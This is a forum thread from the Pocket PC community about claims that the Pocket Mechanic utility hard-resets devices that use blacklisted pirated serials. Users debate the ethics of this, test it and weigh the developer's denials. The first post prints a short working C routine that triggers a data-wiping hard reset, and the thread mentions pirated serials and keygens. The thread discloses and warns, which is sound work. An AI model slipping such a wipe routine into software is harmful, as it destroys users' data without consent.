After reading this thread (http://www.aximsite.com/boards/showthread.php?t=67787) at Aximsite where users complain about hard resets invoked by Pocket Mechanic I thought to shed some light on Anton Tomov's (http://www.antontomov.com/) crude ways of dealing with software pirates.

I understand that Tomov is upset about people using illegal codes for his software. But does this give him the right to forcefully wipe-out someone's PDA? Isn't that highly illegal as well?

That's right. Use a pirated or blacklisted serial with Pocket Mechanic, Pocket Mechanic will detect it, and send your PDA with all its lovely content to Nirvana land. I don't know what Tomov is thinking, but I can only recommend everyone do not buy any of his products. What if a bug sneaks into his code enabling his hardreset routine even if you are a legal buyer? Who is going to pay for your damages? Mr. Tomov, would that be you?

Technicals:
The hardreset routine Tomov uses looks like the following:
#include <windows.h>
#include <winioctl.h>
#define IOCTL_HAL_REBOOT CTL_CODE(FILE_DEVICE_HAL, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)
extern "C" __declspec(dllimport)void SetCleanRebootFlag(void);
extern "C" __declspec(dllimport) BOOL KernelIoControl(
DWORD dwIoControlCode,
LPVOID lpInBuf,
DWORD nInBufSize,
LPVOID lpOutBuf,
DWORD nOutBufSize,
LPDWORD lpBytesReturned);

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPTSTR lpCmdLine, int nCmdShow)
{
SetCleanRebootFlag();
KernelIoControl(IOCTL_HAL_REBOOT, NULL, 0, NULL, 0, NULL);

return 0;
}

Perhaps someone should write a small utility that traps calls to KernelIoControl when the IOCTL_HAL_REBOOT flag is set. I cannot understand why Microsoft makes it so easy for virus programmers and people like Tomov to hard reset someone's PDA.

Are you serious about that, Tad? That *really* stinks!

Edit: Looks this is exactly what happened to some poor people over at Aximsite. I'll put this thread to the frontpage.

Thanks for warning!!! I was actually shopping for some Tomov's products this morning. So now i better just forget about buying his products. And also to warn a few of my friends too!! :angry:

Thanks for the warning TadW, I won't be looking at Tomov's products from now, and will warn my friends about this also.

While registered users have nothing to fear, putting users' data at risk of programing bugs is in my opinion akin to hijacking their PDAs.

These kind of measures only scare away prospective customers. Hopefully, the author will come to realize this.

A better way of dealing with piracy is to let the app display a bogus error message every now and then. This way you can separate the pirates from the customers when a user asks for support.

Thanks for the tip Tad!

That sort of behaviour kinda makes me sick... It's unethical and unnecessary.

Enter one character wrong as a serial number, and you may end up resetting your PPC... And another scary thought is, look at that small amount of code! Around 20 lines of code, and boom... Hard reset. Shouldn't Microsoft make it a LITTLE harder for a program to hard-reset a device?! (But then again, this comes from the same company who made ActiveX, which, in theory, can wipe a hard drive...)

And another scary thought is, look at that small amount of code! Around 20 lines of code, and boom... Hard reset. Shouldn't Microsoft make it a LITTLE harder for a program to hard-reset a device?!
ABSOLUTELY! And Tad already spoke about it in the last paragraph... I also have some Win32 programming knowledge, and I know it would be trivial on desktop Windows to hook one of the two relevant API functions via GetProcAddress and then to put your own lines of code to it (e.g. sanity checks to prevent hard-resets). Not sure if that is possible in WinCE though. Suggestions?

Tough crap. I wonder if the developer is coming to his senses and removing this code asap.

Has anyone verified that this s/w indeed has this code in it?

Maybe we can get the point of view of the developer so that he can state his case.

I contacted Mr Tomov and am awaiting his answer.

I removed Tad's technical analysis (post #11) from this thread. If you want to hear my opinion, follow this thread (http://www.mobileread.com/forums/showthread.php?t=3273).

I removed Tad's technical analysis (post #11) from this thread. If you want to hear my opinion, follow this thread (http://www.mobileread.com/forums/showthread.php?t=3273).
Sounds good! Note that the hard-reset snippet I posted is a known security risk which can be used by any software, worm, virus, etc. to hard-reset a PPC. I would not have posted it if it hadn't been made public already, here (http://www.airscanner.com/pubs/Defcon12.pdf) and here (http://www.pocketpcdn.com/articles/hardreset.html).

For what it's worth, I googled for a serial number, found one on a nasty site for 1.49. I then

- tried 1.49 with this serial. It didn't bomb.
- installed 1.50 which was mentioned in this thread and installed it over 1.49.
- when I clicked on the icon to start PM, my device did a reset and all data in RAM was lost.

Of course, since this was just an experiment, I did a full backup first, so I wasn't hurt. Notice that Tomov silently released 1.51 in the meantime (no mentioning in the changelog), and I haven't tried if the bomb is still in this updated version.

Notice that Anton denies (http://www.antontomov.com/cgi-bin/ikonboard.cgi?act=ST;f=22;t=668) the allegations. He chose his wording very carefully and didn't directly deny that PM would hard-reset your device. Though he says
2. An entry of an invalid serial number won't cause the device to hard-reset. Everybody can check this pretty easily.
he does not say that it would not be possible, under circumstances, that PM hard-resets your device.

Read my previous post. When you enter an illegal serial in PM 1.49 or 1.50, it won't hard-reset your device, as stated by Anton. However, if you are using the particular illegal serial in PM 1.49 which has been then blacklisted in 1.50, running 1.50 with the old serial already installed and still in place in your registry will definitely hard-reset your PDA! Anton, why don't you admit this?

Wow... getting heated up here! Reading the thread over at Anton's website, the guy (or gal?) "ddoodle22" has a point : "people who can heal, can kill!!"

My friends have all remove PM from their PDA already!

I personally went to Anton's forum and asked two very specific questions (http://www.antontomov.com/cgi-bin/ikonboard.cgi?act=ST;f=22;t=668), which he has been avoiding to answer throughout several pages.
Anton, just to clearify this and to avoid any misunderstanding: can you guarantee that there is not - and has never been - any malicious code in Pocket Mechanic that would under any circumstances hard-reset my device without a warning?
and
Thank you I am going to write about this positive development on our frontpage. Does this also apply to version 1.50, which was the version under discussion?

Although still "just" soft proof (I decided to remove Tad's disassembly in this thread which some people might even consider hard proof), I am pretty much convinced that what has been said about Pocket Mechanic 1.50 was true. It contains code that could hard reset your device if you were using a pirated serial. Although I am absolutely not supporting software piracy, I don't think wiping out someone's PDA is any better.

I found these interesting links in Spanish:
http://translate.google.com/translate?u=http%3A%2F%2Fmipcdebolsillo.com%2F&langpair=es%7Cen&hl=en&c2coff=1&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools
http://216.239.39.104/translate_c?hl=en&ie=UTF-8&oe=UTF-8&langpair=es%7Cen&u=http://www.mipcdebolsillo.com/node/19564%23comment-98097&prev=/language_tools
http://216.239.39.104/translate_c?hl=en&ie=UTF-8&oe=UTF-8&langpair=es%7Cen&u=http://barrapunto.com/miradero/04/11/13/1122216.shtml&prev=/language_tools

Looks like Tomov was not alone with his idea of hard-resetting PDAs... "Frank Garci'a (Ctitanic) , the author of the well-known Tweaks2k2 openly comments those that he and a supposed group of developer friends has considered for their creations, recognizing the creation of versions with malicious code to distribute it later conscientiously by the habitual sites "warez" like measurement to concienciar of the necessity to use legally registered versions."

Since I was convinced that Tad's disassembly snippet did not contain any proprietary code nor code relevant to the key engine of Pocket Mechanic, I decided to undelete his post (http://www.mobileread.com/forums/showpost.php?p=14391&postcount=11).

Update: Mr Tomov contacted me and "kindly reminded" me to remove the disassembly code again. Although I don't see how this code violates any copyright laws, since it is essentially equivalent to the public domain c snippet from the first post in this thread, I honor his request and remove it. I don't have the time nor will do fight legal wars with any software developer.

Updated 2: While the code itself might not cause a problem per se, it could help a potential cracker to locate the license checking feature of Pocket Mechanic. This is why Anton asked me to remove it, and I appreciate his time to explain it that me.

This whole thing is a shame. Yes, pirating is bad, but I think targeting registration codes for hard resets is a terrible response. I hope it turns out that this is not what is being done.

If there are specific registrations that are being targeted, there are other alternatives.... like making them invalid and using false error messages after they are used (as suggested by someone before.)

Wasn't there some kind of similar uproar when the recording industry was trying to fight downloaders by putting malicious code on their PCs? I'm pretty sure the overwhelming result was a clear decision and legal consensus that this was not an activity protected by law, and it was not pursued further. Sounds kind of like this case, except the author seems to be digging his heals in rather than backing off. Maybe he's trying to wait it out, believing that the complaints will never turn into a legal battle and people will just "learn to live with it". But the short snippits we've heard from him make it seem pretty clear that his software should be avoided and he is taking a hard line on the topic.
.... I hope I'm wrong.

I think this is sooooo sad. Are developers already that desperate that they have to take these kinds of extreme measures? I know Think2k2 once had a similar destroying code (or was it a fake keygen released by the developer?, don't remember).

I know Tomov has the reputation of a great PPC software developer. I am not sure what he was thinking when he was implementing this code, but I am sure he has now learned his lesson. As far as I know, Pocket Mechanic 1.51 doesn't hard-reset any devices anymore.

Better stay clean and safe! :daisy:

I am somewhat surprised what a wave of frustration I called with my initial post throughout the entire PPC community on the Web; and yet, I am glad that most people think the way I do: although piracy IS bad, it can never be as bad that it would justify Tomov's actions.

Morpheus is right, Anton learned his lesson, and as far as I can tell, Pocket Mechanic 1.51 doesn't kill your PDA anymore (don't take my word for it though!!).

Perhaps in an effort to gain the trust of Pocket PC users again, Mr Tomov has issued a 30% discount on all of his products via PalmGear and Handango for a limited time:

PocketGear: pg5679432
Handango: 1AE7D2F

Btw, Pocket Mechanic 1.52 is out with various improvements, according to the programmer.

30% won't help to return my confidence.

Perhaps in an effort to gain the trust of Pocket PC users again, Mr Tomov has issued a 30% discount on all of his products via PalmGear and Handango for a limited time:

PocketGear: pg5679432
Handango: 1AE7D2F

Btw, Pocket Mechanic 1.52 is out with various improvements, according to the programmer.

Is it safe to say that Pocket Mechanic 1.52 doesn't hard-reset the device?

I am not sure if it is 100% safe, but it was confirmed by several people that since 1.51 PM would not hard reset your device anymore with known blacklisted serial numbers. And I think Anton is wise enough not to repeat his mistake.

Lately my friend who downloaded the latest keygen/crack for the Resco Pic Viewer v5.30, had his PPC hard reset after he executed and exit the program!!! So please be informed that Anton Tomov has actually given a brilliant but cruel idea to the Resco developers to follow his footsteps!

Lately my friend who downloaded the latest keygen/crack for the Resco Pic Viewer v5.30, had his PPC hard reset after he executed and exit the program!!! So please be informed that Anton Tomov has actually given a brilliant but cruel idea to the Resco developers to follow his footsteps!
Cannot confirm that. After your post I analyzed the binaries but couldn't find anything that would trigger a similar code as the one that was used by Tomov. Perhaps something else was in the memory of your friend's PPC that caused the reset?

Hi Folks,

Well, as a new iPAC owner, with about $1400. now invested in my PCC and software and smart card and extended battery, I am now not feeling real great about having this "Pocket Mechanic" utility! :huh: I have another program that does some of the same things...called MemMaid and MemMaidClener. But wonder if since I have this registered now if I am safe or still at risk? :blink:

OK, my MAIN question is around uninstalls. We all know how uninstalling from a regular PC using Windows XP or somethng similar can be incomplete and leave "straggler" files in the registry and all, sometimes not causing ny problems, and sometimes making for a real mess right away or down the road.

Anyone have any utility they like that seeks out empty files, unlinked files, and other things, that is safe and user-friendly, but useful to make sure to not only keep a clean PCC and keep up the speed and programs working well, but also keep as much free space as possible? They have many of these for regular PC's. Norton makes some and several other companies, so I would be surprised if they there were not ones for PCC's as well. I have had 4-5 uninstalls recently where it said "Uninstall unsuccessful" -- it couldn't delete all the files, even though I made sure they were closed and not running when I started the uninstall process. :angry:

Thanks for any suggestions or help on this. I just got my iPAC for DUMMIES book today, and actually it's not bad...alot of hints and tricks and stuff my manual doesn't explain, not to mention many other things the manual leaves out as most manuals do. In case you need to know for your recomendation of an uninstall or clean up utility, I have an iPAC hx2755.

Thanks very much, and hope you alll have a great weekend! :sunny:

circawdm

Try SKTools (http://www.pocketgear.com/software_detail.asp?id=14288). It does everything you are looking for, like find orphaned files, uninstall programs etc. It's not free but definitely worth every cent! And no, I am in no way affiliated with that tool ;)

Cannot confirm that. After your post I analyzed the binaries but couldn't find anything that would trigger a similar code as the one that was used by Tomov. Perhaps something else was in the memory of your friend's PPC that caused the reset?

My friend is a careful ppc geek, acc to him, there is no problem with upgrading the Resco Explorer using the cr@ck. He removed the Resco Pic Viewer v5.20 (incl. cleaning up the registry), before installing the v5.30 and then use the keygen to generate the code. After keying in the code, there was a "Thank You For Purchasing..." pop-up, and then the pic viewer was able to run like normal. However when he closed and exit the program, the whole ppc suddenly just went blank and needing a hard reset. He repeated the installation after the hard reset and yield the same end-result! He asked me to try out, but so far, since i have no backup for my ppc, i dare not take up this challenge! ;)

My friend is a careful ppc geek, acc to him, there is no problem with upgrading the Resco Explorer using the cr@ck.

Your "friend" *cough* may (or may not) be careful, but I for one see a major problem...


After keying in the code, there was a "Thank You For Purchasing..." pop-up, and then the pic viewer was able to run like normal. However when he closed and exit the program, the whole ppc suddenly just went blank and needing a hard reset. He repeated the installation after the hard reset and yield the same end-result!

Hardly proof that Resco Explorer contains malicious code, especially if an examination of the binaries didn't reveal anything suspicious. I wouldn't go making accusations that infer that Resco is utilizing malicious code to thwart piracy, thereby questioning their reputation, especially seeing that it's with anecdotal evidence from someone who by their own admission is not a legitimate licensee.

I on the other hand am a legitimate Resco Explorer and Viewer (for Palm OS) user, and in my experience they make quality products and have excellent customer support.

I'm disappointed to see someone (with only 4 posts I might add) openly discussing on these boards the use of pirated/cracked software (by a "friend") and spreading unsubstantiated (and with flimsy "evidence" at best) allegations that could possibly harm a very well respected software developer.

Is it possible to "subtract" Karma?

Brian

Hey All,

Well, I upgraded to version 1.52 last night, and aside from a few added features, no problems at all. I am fully backed up on my PC and SD card of course.

I am not so sure if this guy is as nefarious as we are making him seem. Just to consider:

1. He gives his support email address
2. He stands to lose alot of income if his s/w gets trashed or discontinued etc. or he gets sued (a possibility, esp. a class action suit by 100-500 or more people) and that would also drag in pocket Gear and Handango, who I am sure have their own techies, who especially when alerted test out any questionable (or things people have complained about) s/w to see if they want to continue selling it. After all, their reputation is on the line also big time.
3. He keeps updating it, instead of disappearing into the dark with his money and coming out with something else to make money on and selling it through some other venue, perhaps even another name or company name.

I am for waiting and seeing what Alexander hears back before I judge this guy or mutter, as they say on TV, "Get a rope." :hanged: :)

DRT

I think we are talking about several programs here at once. So let me summarize:

For as much as I know, Pocket Mechanic did have a hard-reset routine for stolen serials for versions before 1.51. Ever since, Anton has removed the code.

Regarding Resco Viewer 5.30, I cannot commend. Resco makes some of the finest apps for Pocket PCs, and I haven't read anything bad about them. Since it was Tad who revealed the malicious code in PM, I rely on his observations when he says that there is no harmful code present in Resco Viewer. Btw, V5.31 has been released; so in case your friend's device was really hard-resetted due to some - perhaps faulty - code in 5.30, ask him to check 5.31.

I guess the moral of this discussion is that it pays to stay legit!

Thanks Morpheus, :)

I'll go check it out. I don't mind paying for good software, and if there is a TRIAL version, I learned to try it first! Part of the whole deal with Anton and PM, which which I bought and registered and is now version 5.1 is that people didn't pay I guess, and used other folks serial numbers on their
devices.

While I do not condone the rather harsh hard reset consequence Anton apparently put in his earlier versions for those who didn't buy it and use their own code, I can see if I were an inventor trying to sell something, I would try my best to make sure for every 100 copies I sold, 500 did not get given out for free essentially. It's not much different than all the safeguards Microsoft and other big PC manufacturers try to take to protect their investments, as well as the music and DVD-video industry (huge cases in point). And obviously the government and courts see it as a serious enough problem that the federal fines for big time piracy are very stiff I guess. :beadyeyes

I'm not trying to come off as a "goodie two shoes," (or three shoes), but I guess I feel like if my "product" I spent alot of time and money on making, testing, advertising and then promoting etc. was being ripped off, and I was losing alot of money, I am sure I would feel p***ed off as well. I wouldn't go burn crosses in people's yards or give their computers a virus, but I would somehow try to stop it any way I could. Anton just picked a very nasty and severe punishment it seems for his earlier versions. Who knows? Maybe this is his whole life income and he has a wife and 6 kids to feed, etc? If it were me, I'd protect my income also. But I would do it in less "destructive" ways.

Anyhow, off to find SKTools!

DRT (and happy Mother's Day to any who consider themselves mothers) ;)